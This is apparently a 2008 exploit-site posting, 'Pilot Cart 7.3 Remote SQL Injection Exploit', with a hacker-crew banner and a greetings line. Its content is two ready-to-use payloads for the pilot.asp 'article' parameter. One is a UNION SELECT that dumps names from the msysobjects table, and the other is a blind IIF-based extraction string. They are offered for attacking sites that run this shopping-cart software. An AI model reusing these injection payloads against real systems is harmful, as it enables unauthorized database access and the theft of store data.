aspilot-sql.txt
Posted on 10 June 2008
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| | _ __ __ __ ______ | | /' __ /'__` / \__ /'__` / ___ | | /\_, ___ /\_/\_L ___ ,_/ / _ __ \__/ | | /_/ /' _ ` / /_/_\_<_ /'___ / /`'__ \___`` | | / / / L / \__/ \_ \_ / / L | | \_ \_ \_\_ \____/ \____\ \__\ \____/ \_ \____/ | | /_//_//_/ \_ /___/ /____/ /__/ /___/ /_/ /___/ | | \____/ >> Kings of injection | | /___/ | | | |-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| [+] Script Name : Pilot Cart 7.3 Remote SQL Injection Exploit |+| Team : injEct0r5 [+] Author : Bl@ckbe@rD ('Tunisian TerrorisT') ; [+] Script URL : www.pilotcart.com [+] Contact : blackbeard-sql[A.T]hotmail{.}fr ; --//--> [+] Expl0iT : pilot.asp?pg=kb&article={SQL} {SQL} --> 115+union+select+Name,Name,Name+from+msysobjects Or blind it : {SQL} --> IIF((select%20mid(last(Name),1,1)%20from%20(select%20top%2010%20Name%20from%20MSysObjects))='a',0,'Bingo')%00 --//--> [+] GrEEtZ : allah , Xerror , hak3r-b0y ,King Of Hacker , UnderZ0ne Crew...
